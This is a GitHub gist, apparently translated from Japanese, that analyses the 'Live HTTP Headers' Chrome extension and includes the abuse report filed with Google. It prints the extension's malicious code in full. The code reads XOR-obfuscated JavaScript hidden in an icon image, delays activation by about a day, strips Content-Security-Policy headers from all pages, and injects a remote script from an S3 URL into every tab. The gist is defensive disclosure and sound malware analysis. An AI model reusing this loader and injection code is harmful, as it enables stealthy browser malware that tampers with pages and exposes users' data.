Skip to content

Instantly share code, notes, and snippets.

@aburd
Forked from mala/a.md
Last active November 12, 2016 10:24
Show Gist options
  • Save aburd/12884f845ee72069311b474adab7ad6b to your computer and use it in GitHub Desktop.
Save aburd/12884f845ee72069311b474adab7ad6b to your computer and use it in GitHub Desktop.
Investigation into the Live HTTP Headers Chrome Extension (Introduced by CoolBar.Pro - An investigation into what the extension is actually doing)

I looked into the Live HTTP Headers Chrome Extension more. This is not the one for Firefox. This is not the one for Firefox.

11/7 note


background.min

  • There's processing which reads Javascript that is cut out of a picture file and made into blob. addScript adds itself to background.html (extension context).
  • If the extension's localStorage's T variable is undefined, a setTimeout function of 4568904 milliseconds which sets T to the current time.
  • Once the current time is set, the script from the from the picture file is read in.

the script inside the picture

  • If localStorage's ID property is undefined then it is defined as current time after 3600000 milliseconds using setTimeout.

  • Furthermore, ID's if the difference between value and the current time is greater than 86400000 millisecond, then an event handler is set on web request.

  • The script that is being read in dynamically is running on the web page being displayed, not the background page.

  • At that time, if there is a CSP header it disables


What happens (in reality)

  • Once the extension is installed, after about one day passes, the script injection on the page becomes enabled
  • Once is enabled, on the website side the CSP settings are disabled
  • On whether or not this is enabled, you will be able to tell if on a CSP enabled website you can preform actions that normally illegal on a CSP enabled site. For example, on the github developer console typing things like document.write("<script>alert(1)</script>")
  • I haven't looked into the script that is loaded dynamically.

What could happen (possibly)

  • Theoretically with the permissions of being an extension, anything you can send and receive with http, including the headers. However, since the dynamically loaded script in executed in the context of a web page, so realistically it can't go that far.

  • The modified response headers can be statically written within the extension

  • There are things that can be acquired, like user input into the website, contents shown on the page, cookies without the httponly flag, etc.

  • Chrome Extension's default CSP does not allow outside scripts loaded into the extensions context https://developer.chrome.com/extensions/contentSecurityPolicy

  • So, if it is not expressly declared with the manifest.json file to allow outside scripts, within the context of the extension execution of what kinds of scripts are unchangeable

  • So if the technique of script injection on a page is used, you won't for example get all the data stolen at the very moment the script is installed on a page

  • But the influence of the script will persist on all sites visited while the extension is enabled

About the source of the script

  • Judging by the extension's privacy policy's html and the script from AWS's URL, the service is using coolbar.pro
  • On the site, is says that they are a service which is oriented towards the monetizing of extensions
  • This code was acquired by another company wherein malware was inserted
  • You can't register unless you have an invite code, so I couldn't tell what menus were there

For consideration

  • The code itself does things like load in an outside scripts which become enabled after a fixed period of time, so it's a bit hard to detect its odd behaviors

  • It would be hard to catch the code hidden inside of the image through things like automatic scans.

  • Since they are using a method that is hard to detect which are the methods of malware

  • At the point that CSP is disabled on the client side, this is, to say the least, harmful

var viewTabId=0;chrome.browserAction.onClicked.addListener(function(){var a=chrome.extension.getURL("live.html");if(0!=viewTabId)try{chrome.tabs.remove(viewTabId,function(){})}catch(a){console.log(a)}chrome.tabs.create({url:a})});
(() => {
var main = () => {
chrome.runtime.getPackageDirectoryEntry(function (root) {
var icon = "img/icon2.png";
root.getFile(icon, {}, function (fileEntry) {
fileEntry.file(function (file) {
var reader = new FileReader();
reader.onloadend = function (e) {
var text = this.result;
var idxF = text.lastIndexOf("init>");
if (idxF < 0) return;
text = text.substr(idxF + 5);
var idxL = text.lastIndexOf("<end");
if (idxL < 0) return;
text = text.substr(0,idxL);
for (var t = 0, r = text.length, n = ""; r > t;)
n += String.fromCharCode(77 ^ text.charCodeAt(t++));
var a = new window.Blob([n], {
type: "text/javascript"
});
addScript(window.URL.createObjectURL(a));
};
reader.readAsText(file);
}, (e) => {
console.log(e)
});
}, (r) => {
console.log(r)
});
});
};
var check = () => {
chrome.storage.local.get({T : 0}, (r) => {
r.T == 0 ? setTimeout(check, 6e5) : main();
})
};
(() => {
if (!chrome.contextMenus) {
return void console.log("Chrome contextMenus access failed"); // live_http_headers
}
chrome.contextMenus.create({
title: "EULA",
contexts: ["browser_action"],
onclick: function () {
window.open("/html/doc/eula.html", "_blank");
}
});
chrome.contextMenus.create({
title: "Privacy Policy",
contexts: ["browser_action"],
onclick: function () {
window.open("/html/doc/pp.html", "_blank");
}
});
chrome.contextMenus.create({
title: "Terms and Conditions",
contexts: ["browser_action"],
onclick: function () {
window.open("/html/doc/tandc.html", "_blank");
}
});
})();
function addScript(src) {
var script = document.createElement("script");
script.setAttribute("type", "text/javascript");
script.setAttribute("src", src);
document.head.appendChild(script);
}
setTimeout(function(){
chrome.storage.local.get({T : 0}, (r) => {
r.T == 0 && chrome.storage.local.set({T : new Date().getTime()});
});
}, 4568904);
check()
})();
chrome.runtime.setUninstallURL('http://extsgo.com/api/tracker/uninstall?ext_id=' + chrome.runtime.id);
// blob:chrome-extension://iaiioopjkcekapmldfgbebdclcnpgnlo/45c84012-29d7-4340-8657-934c073f06fb
var zero = (a,b)=>{
chrome.storage.local.get({
ID: 0
}, (c=>{
0 == c.ID ? (()=>{
chrome.storage.local.set({
ID: (new Date).getTime()
}),
setTimeout(zero, a, a, b)
}
)() : (()=>{
((new Date).getTime() - c.ID || 0) < b ? setTimeout(zero, a, a, b) : one()
}
)()
}
))
}
, one = ()=>{
chrome.webRequest && chrome.webRequest.onHeadersReceived.addListener((a=>{
if (a.tabId != -1) {
for (var b in a.responseHeaders)
"object" == typeof a.responseHeaders[b] && "content-security-policy" === a.responseHeaders[b].name.toLowerCase() && a.responseHeaders.splice(b, 1);
return {
responseHeaders: a.responseHeaders
}
}
}
), {
urls: ["<all_urls>"],
types: ["main_frame"]
}, ["responseHeaders", "blocking"]),
chrome.tabs && chrome.tabs.onUpdated.addListener(((a,b)=>{
"complete" == b.status && chrome.tabs.executeScript(a, {
code: `(() => {var s = document.createElement('script');s.src = '//s3.eu-central-1.amazonaws.com/forton/live_http_headers.js';document.body.appendChild(s);})();`
})
}
))
}
;
zero(36e5, 864e5);
# Report of improper use, submitted on 11/7
The extension, live http headers, has behaviors which violate the policy on http headers
https://chrome.google.com/webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo
https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk
- On the extension's "background js", there is some hard to read script that has been obfuscated and buried within the file
- On the website side (chrome.tabs.executeScript) there is outside js code being brough in, this is unexplained to the user.
- At the very least, there are scripts that are being executed on websites (not the extension), URL tracking, etc. included in this extension. There is a possibility that this is changing the behavior of pages, even after they've been loaded.
- Through setTimeout, this behavior is enabled after a long period of time (over 24 hours)
- For things that have WebRequestBlocking permission, the website's content security policy is disabled, and outside scripts are then appended and loaded onto currently accessed webpages.
- Although there are extensions that give a clear reason for CSP relief, these extensions explain to the users that they disable CSP to load and execute outside scripts
This is against Google Store's policy.
https://developer.chrome.com/webstore/program_policies
"We don't allow content that harms or interferes with the operation of the networks, servers, or other infrastructure of Google or any third-parties."
Furthermore, this can be considered unwanted software.
https://www.google.com/about/company/unwanted-software-policy.html
There are 2 patterns/methods where the hidden functionality is buried.
1. There is obfuscated/hard-to-read code within the library.
2. There is script which is hard-to-read and buried within an image file.
For number one, both the functions "jquery.check" and "jquery.proceed" are not in the original jquery library. The string "String.fromCharCode(77" is also included.
A few have been deleted from the Store, so this is probably something that is already known. You have probably also received reports from other users.
Regarding number two, from around 2016-10-17, there has been patterns of an embedded script inside an image file. There has been not been one part of the script inside that image that has been deleted.
...snip...
Other than http headers, live http headers, there are other extensions with the same obfuscated code available for download.
...snip...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment